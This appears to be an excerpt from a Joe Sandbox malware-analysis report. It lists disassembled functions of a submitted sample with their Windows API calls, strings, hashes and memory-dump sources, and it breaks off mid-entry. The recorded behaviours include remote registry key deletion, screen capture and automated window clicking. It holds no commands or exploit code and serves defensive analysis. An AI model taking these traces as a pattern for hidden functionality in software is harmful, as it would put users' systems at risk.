                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                  • String ID:
                                  • API String ID: 3840717409-0
                                  • Opcode ID: 47d0f1d9f8b99bdb73f02b5454ecaae119599114c5fa3f27aea078d1693e6813
                                  • Instruction ID: ecc6c2228a3377d323623e27a5c960cc294f66bb05898508ff124997e4b0cca3
                                  • Opcode Fuzzy Hash: 47d0f1d9f8b99bdb73f02b5454ecaae119599114c5fa3f27aea078d1693e6813
                                  • Instruction Fuzzy Hash: E4412D75600258AFDB22DFA5CC88EAE7BBCEF49711F114658F919EB290DB309D01CB20
                                  Function 003C14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VariantInit.OLEAUT32(00000000), ref: 003C1502
                                  • VariantCopy.OLEAUT32(?,?), ref: 003C150B
                                  • VariantClear.OLEAUT32(?), ref: 003C1517
                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 003C15FB
                                  • VarR8FromDec.OLEAUT32(?,?), ref: 003C1657
                                  • VariantInit.OLEAUT32(?), ref: 003C1708
                                  • SysFreeString.OLEAUT32(?), ref: 003C178C
                                  • VariantClear.OLEAUT32(?), ref: 003C17D8
                                  • VariantClear.OLEAUT32(?), ref: 003C17E7
                                  • VariantInit.OLEAUT32(00000000), ref: 003C1823
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                  • API String ID: 1234038744-3931177956
                                  • Opcode ID: 5b403e647ebaa56dc276accb49046fb52387ba030f60b1c9dfa9866bd05a6df5
                                  • Instruction ID: 9ba8b446468eaedfb8a5f4e5e1d524b490fc5ca1c42da85c12a3f0f704e322fc
                                  • Opcode Fuzzy Hash: 5b403e647ebaa56dc276accb49046fb52387ba030f60b1c9dfa9866bd05a6df5
                                  • Instruction Fuzzy Hash: AAD1FE71A00215DBCB129F65E885F6DB7B9BF47700F50809AE806EF592DB30EC45EBA1
                                  Function 003DB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00359CB3: _wcslen.LIBCMT ref: 00359CBD
                                    • Part of subcall function 003DC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DB6AE,?,?), ref: 003DC9B5
                                    • Part of subcall function 003DC998: _wcslen.LIBCMT ref: 003DC9F1
                                    • Part of subcall function 003DC998: _wcslen.LIBCMT ref: 003DCA68
                                    • Part of subcall function 003DC998: _wcslen.LIBCMT ref: 003DCA9E
                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003DB6F4
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003DB772
                                  • RegDeleteValueW.ADVAPI32(?,?), ref: 003DB80A
                                  • RegCloseKey.ADVAPI32(?), ref: 003DB87E
                                  • RegCloseKey.ADVAPI32(?), ref: 003DB89C
                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 003DB8F2
                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003DB904
                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 003DB922
                                  • FreeLibrary.KERNEL32(00000000), ref: 003DB983
                                  • RegCloseKey.ADVAPI32(00000000), ref: 003DB994
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                  • API String ID: 146587525-4033151799
                                  • Opcode ID: 184fa418aa7f54aa403a78a09c99446c434cdc6f42dbbb9270e76a0a852929a5
                                  • Instruction ID: c31a73daa462c933aa2ae1bf3e3b27eac3a7a319f59793607a1d00de47727d7f
                                  • Opcode Fuzzy Hash: 184fa418aa7f54aa403a78a09c99446c434cdc6f42dbbb9270e76a0a852929a5
                                  • Instruction Fuzzy Hash: E1C18B35204241EFD712DF24D495F2ABBE5BF84318F16859DE89A4B3A2CB31EC46CB91
                                  Function 003D255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetDC.USER32(00000000), ref: 003D25D8
                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 003D25E8
                                  • CreateCompatibleDC.GDI32(?), ref: 003D25F4
                                  • SelectObject.GDI32(00000000,?), ref: 003D2601
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 003D266D
                                  • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 003D26AC
                                  • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 003D26D0
                                  • SelectObject.GDI32(?,?), ref: 003D26D8
                                  • DeleteObject.GDI32(?), ref: 003D26E1
                                  • DeleteDC.GDI32(?), ref: 003D26E8
                                  • ReleaseDC.USER32(00000000,?), ref: 003D26F3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                  • String ID: (
                                  • API String ID: 2598888154-3887548279
                                  • Opcode ID: 6c7366d83a42459ba75fce8516c0d8e9697b14c668e7b6ca701544030aacd2c6
                                  • Instruction ID: afeab6443d3c59d8b8f941aad6b3d7d32b2e76da65337320330fe2c88c02039a
                                  • Opcode Fuzzy Hash: 6c7366d83a42459ba75fce8516c0d8e9697b14c668e7b6ca701544030aacd2c6
                                  • Instruction Fuzzy Hash: F161E276D00219EFCF15CFA4D884EAEBBB9FF48310F24852AE955AB250D770A951CF50
                                  Function 0038DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • ___free_lconv_mon.LIBCMT ref: 0038DAA1
                                    • Part of subcall function 0038D63C: _free.LIBCMT ref: 0038D659
                                    • Part of subcall function 0038D63C: _free.LIBCMT ref: 0038D66B
                                    • Part of subcall function 0038D63C: _free.LIBCMT ref: 0038D67D
                                    • Part of subcall function 0038D63C: _free.LIBCMT ref: 0038D68F
                                    • Part of subcall function 0038D63C: _free.LIBCMT ref: 0038D6A1
                                    • Part of subcall function 0038D63C: _free.LIBCMT ref: 0038D6B3
                                    • Part of subcall function 0038D63C: _free.LIBCMT ref: 0038D6C5
                                    • Part of subcall function 0038D63C: _free.LIBCMT ref: 0038D6D7
                                    • Part of subcall function 0038D63C: _free.LIBCMT ref: 0038D6E9
                                    • Part of subcall function 0038D63C: _free.LIBCMT ref: 0038D6FB
                                    • Part of subcall function 0038D63C: _free.LIBCMT ref: 0038D70D
                                    • Part of subcall function 0038D63C: _free.LIBCMT ref: 0038D71F
                                    • Part of subcall function 0038D63C: _free.LIBCMT ref: 0038D731
                                  • _free.LIBCMT ref: 0038DA96
                                    • Part of subcall function 003829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0038D7D1,00000000,00000000,00000000,00000000,?,0038D7F8,00000000,00000007,00000000,?,0038DBF5,00000000), ref: 003829DE
                                    • Part of subcall function 003829C8: GetLastError.KERNEL32(00000000,?,0038D7D1,00000000,00000000,00000000,00000000,?,0038D7F8,00000000,00000007,00000000,?,0038DBF5,00000000,00000000), ref: 003829F0
                                  • _free.LIBCMT ref: 0038DAB8
                                  • _free.LIBCMT ref: 0038DACD
                                  • _free.LIBCMT ref: 0038DAD8
                                  • _free.LIBCMT ref: 0038DAFA
                                  • _free.LIBCMT ref: 0038DB0D
                                  • _free.LIBCMT ref: 0038DB1B
                                  • _free.LIBCMT ref: 0038DB26
                                  • _free.LIBCMT ref: 0038DB5E
                                  • _free.LIBCMT ref: 0038DB65
                                  • _free.LIBCMT ref: 0038DB82
                                  • _free.LIBCMT ref: 0038DB9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                  • String ID:
                                  • API String ID: 161543041-0
                                  • Opcode ID: 8a7cc6d1fb90e2d7423dad5211ea4a189496f09685f99c61627aadf5fb8b3670
                                  • Instruction ID: 55ceca27d38b8daa5e6c616001560d481105ae0aa91f60a8ec9f8ae875ce5b9c
                                  • Opcode Fuzzy Hash: 8a7cc6d1fb90e2d7423dad5211ea4a189496f09685f99c61627aadf5fb8b3670
                                  • Instruction Fuzzy Hash: C03137316443059FEB27BA39E845B5BB7E9FF01320F2644A9E449DB191DF39AC908B20
                                  Function 003B365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetClassNameW.USER32(?,?,00000100), ref: 003B369C
                                  • _wcslen.LIBCMT ref: 003B36A7
                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 003B3797
                                  • GetClassNameW.USER32(?,?,00000400), ref: 003B380C
                                  • GetDlgCtrlID.USER32(?), ref: 003B385D
                                  • GetWindowRect.USER32(?,?), ref: 003B3882
                                  • GetParent.USER32(?), ref: 003B38A0
                                  • ScreenToClient.USER32(00000000), ref: 003B38A7
                                  • GetClassNameW.USER32(?,?,00000100), ref: 003B3921
                                  • GetWindowTextW.USER32(?,?,00000400), ref: 003B395D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                  • String ID: %s%u
                                  • API String ID: 4010501982-679674701
                                  • Opcode ID: df9c595c93a8194dce51992197686730ba101721599bb6fa8a08f8adf24c226c
                                  • Instruction ID: 1922c8c1567da72f8fd5a09a19f06bc32d65cee693a2587727eb4aaff4b8ce95
                                  • Opcode Fuzzy Hash: df9c595c93a8194dce51992197686730ba101721599bb6fa8a08f8adf24c226c
                                  • Instruction Fuzzy Hash: 5791E571204716AFD71ADF24C885FEAF7A8FF44308F008629FA99C6590DB30EA45CB91
                                  Function 003B4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetClassNameW.USER32(?,?,00000400), ref: 003B4994
                                  • GetWindowTextW.USER32(?,?,00000400), ref: 003B49DA
                                  • _wcslen.LIBCMT ref: 003B49EB
                                  • CharUpperBuffW.USER32(?,00000000), ref: 003B49F7
                                  • _wcsstr.LIBVCRUNTIME ref: 003B4A2C
                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 003B4A64
                                  • GetWindowTextW.USER32(?,?,00000400), ref: 003B4A9D
                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 003B4AE6
                                  • GetClassNameW.USER32(?,?,00000400), ref: 003B4B20
                                  • GetWindowRect.USER32(?,?), ref: 003B4B8B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                  • String ID: ThumbnailClass
                                  • API String ID: 1311036022-1241985126
                                  • Opcode ID: 8ea3bbe51a8d56b3c8b667d61038278e30588185740b287c47a5a06f8eb19e07
                                  • Instruction ID: 1bdca9e15110faf3861973c1a65445226d69630279cea89103ac50c32ee50e57
                                  • Opcode Fuzzy Hash: 8ea3bbe51a8d56b3c8b667d61038278e30588185740b287c47a5a06f8eb19e07
                                  • Instruction Fuzzy Hash: FA91CE310042059FDB16CF14C981BEA7BE8FF84318F04846AFE859A596DB34ED45CBA5
                                  Function 003DCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 003DCC64
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 003DCC8D
                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 003DCD48
                                    • Part of subcall function 003DCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 003DCCAA
                                    • Part of subcall function 003DCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 003DCCBD
                                    • Part of subcall function 003DCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003DCCCF
                                    • Part of subcall function 003DCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 003DCD05
                                    • Part of subcall function 003DCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 003DCD28
                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 003DCCF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                  • API String ID: 2734957052-4033151799
                                  • Opcode ID: 3188e60bb92bf8fe097b81d2ff470ecea21684b9405e26619ddd490a81817acc
                                  • Instruction ID: 554ed8f7bd9f8422e79462ca898f06eb3798f582848e6c0185401a4f74e60748
                                  • Opcode Fuzzy Hash: 3188e60bb92bf8fe097b81d2ff470ecea21684b9405e26619ddd490a81817acc
                                  • Instruction Fuzzy Hash: E6318272921129BBDB329B50EC88EFFBB7CEF05740F011166F906E7240D6349E46DAA0
                                  Function 003BE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • timeGetTime.WINMM ref: 003BE6B4
                                    • Part of subcall function 0036E551: timeGetTime.WINMM(?,?,003BE6D4), ref: 0036E555
                                  • Sleep.KERNEL32(0000000A), ref: 003BE6E1
                                  • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 003BE705
                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003BE727
                                  • SetActiveWindow.USER32 ref: 003BE746
                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003BE754
                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 003BE773
                                  • Sleep.KERNEL32(000000FA), ref: 003BE77E
                                  • IsWindow.USER32 ref: 003BE78A
                                  • EndDialog.USER32(00000000), ref: 003BE79B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                  • String ID: BUTTON
                                  • API String ID: 1194449130-3405671355
                                  • Opcode ID: d77ade6aae0e52183d058c68f6c506b9715582dc0b5338733a96df5a48307d48
                                  • Instruction ID: 233a6f0133d4b71d5838898c4bed29fa7a90c3f5bdf0fe56c8516ee5c518dc1d
                                  • Opcode Fuzzy Hash: d77ade6aae0e52183d058c68f6c506b9715582dc0b5338733a96df5a48307d48
                                  • Instruction Fuzzy Hash: 72219871310244BFEB235F24EDC9BAA3B5DE75534CF502434FA11A6AF1DBB19C028A18
                                  Function 003BE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00359CB3: _wcslen.LIBCMT ref: 00359CBD
                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003BEA5D
                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003BEA73
                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003BEA84
                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003BEA96
                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003BEAA7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: SendString$_wcslen
                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                  • API String ID: 2420728520-1007645807
                                  • Opcode ID: 485813788fbd7e999dab4fac9bb487a43320a04dfd82ea3bd9d2f19cf593f288
                                  • Instruction ID: a5f4e8558138d070fcc625c68717e1c1684b61e927c3ad8a0c859a245c703415
                                  • Opcode Fuzzy Hash: 485813788fbd7e999dab4fac9bb487a43320a04dfd82ea3bd9d2f19cf593f288
                                  • Instruction Fuzzy Hash: D111C671AA02597AD721A7A5DC4AEFF6B7CEFD1B04F11042A7811A60E1EF704D89C5B0
                                  Function 00368BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00368F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00368BE8,?,00000000,?,?,?,?,00368BBA,00000000,?), ref: 00368FC5
                                  • DestroyWindow.USER32(?), ref: 00368C81
                                  • KillTimer.USER32(00000000,?,?,?,?,00368BBA,00000000,?), ref: 00368D1B
                                  • DestroyAcceleratorTable.USER32(00000000), ref: 003A6973
                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00368BBA,00000000,?), ref: 003A69A1
                                  • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00368BBA,00000000,?), ref: 003A69B8
                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00368BBA,00000000), ref: 003A69D4
                                  • DeleteObject.GDI32(00000000), ref: 003A69E6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                  • String ID:
                                  • API String ID: 641708696-0
                                  • Opcode ID: 7c6f8d59b314cc434971bd251e12e7708fd3ef2cbe88b0f55423e9c5c4697390
                                  • Instruction ID: a27deb88d53216910ade9c3a6aae1e4dbba21bd8cdf90cb0f9c212c2b53b99bb
                                  • Opcode Fuzzy Hash: 7c6f8d59b314cc434971bd251e12e7708fd3ef2cbe88b0f55423e9c5c4697390
                                  • Instruction Fuzzy Hash: 0E619C71202700DFCB379F24D959B2AB7B5FB59312F55862CE0429B9B4CB31AC92CB54
                                  Function 00369838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00369944: GetWindowLongW.USER32(?,000000EB), ref: 00369952
                                  • GetSysColor.USER32(0000000F), ref: 00369862
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
